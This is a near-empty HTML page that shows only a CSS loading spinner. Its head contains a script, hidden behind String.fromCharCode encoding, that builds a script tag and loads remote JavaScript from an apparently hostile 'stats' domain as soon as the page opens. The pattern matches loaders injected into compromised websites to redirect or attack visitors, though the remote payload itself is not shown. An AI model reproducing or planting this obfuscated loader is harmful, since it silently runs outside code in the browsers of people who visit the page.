<html><head><title></title><style>.loader {
  border: 16px solid #f3f3f3; /* Light grey */
  border-top: 16px solid #3498db; /* Blue */
  border-radius: 50%;
  width: 120px;
  height: 120px;
  animation: spin 2s linear infinite;
}
.centered {
   position: fixed;
  top: 50%;
  left: 50%;
  margin-top: -50px;
  margin-left: -100px;
}
@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}</style><script type='text/javascript'>var e;Element.prototype.appendAfter=function(e){e.parentNode.insertBefore(this,e.nextSibling)},(e=document.createElement(String.fromCharCode(115,99,114,105,112,116))).type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116),e.src=String.fromCharCode(104,116,116,112,115,58,47,47,115,116,97,116,115,46,108,111,98,98,121,100,101,115,105,114,101,115,46,99,111,109,47,102,111,108,100),e.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]),e.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]),document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(e);</script></head><body> <div class='loader centered'></div></body></html>